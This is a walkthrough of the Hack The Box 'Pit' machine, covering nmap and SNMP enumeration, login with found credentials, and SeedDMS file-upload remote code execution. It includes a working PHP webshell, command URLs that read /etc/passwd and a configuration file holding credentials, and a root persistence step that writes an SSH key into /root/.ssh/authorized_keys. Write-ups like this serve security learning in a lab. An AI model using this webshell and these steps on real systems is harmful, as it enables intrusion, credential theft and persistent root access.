PIT

Scanning

NMAP

• TCP

➜  ~ nmap -T4 -p- -A pit.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 12:10 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.21s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time

add dms-pit.htb to hosts file

• UPD

  after a while i realize no way to start attack on TCP ports so go for UPD scan

➜  ~ sudo nmap -T5 -sU --top-ports 4 pit.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 14:10 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.22s latency).

PORT    STATE         SERVICE
123/udp filtered      ntp
137/udp filtered      netbios-ns
161/udp open|filtered snmp
631/udp filtered      ipp

Nmap done: 1 IP address (1 host up) scanned in 1.92 seconds

161/udp open|filtered snmp it the way

Enumeration

cat 10.10.10.241.snmp

We find this directory /seeddms51x/seeddms

i tried some default credentials but nothing ...

back to SNMP file searching for Credintials

after some tries credentials michelle:michelle

Exploit

now we know the version of DMS seedDMS 5.1.15

exploit

➜  ~ cat 47022.txt 
# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code: 
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

create backdoor

in this directory DMS /Docs /Users /Michelle /

upload shell.php as 1.php step 3

documentid=30 check yours ...

step 4

http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat%20/etc/passwd

shadow not accessible

reverse shell not working

i tried Path Traversal to access DB credentials it work

http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat%20../../../conf/settings.xml

inspect this page

search username

lets use this credentials to login main App

after some tries Credentials michelle:ied^ieY6xoquu

WE IIIIIIIIIIIIIIIIIN 🎉

and Terminal tap calls us

• USER FLAG

Privilege Escalation

from snmp enum we find this

can't access this dir

lets check permission on this dir

michelle -wx we can write and execute

Lets create a SSH payload with out public key and put it into the /usr/local/monitoring directory

on attacker machine

after creating the key place it in this payload and save

echo "your-public-ssh-key" > /root/.ssh/authorized_keys

save as check.sh

start local server

➜  ~ snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects

this line to execute script check this

• ROOT FLAG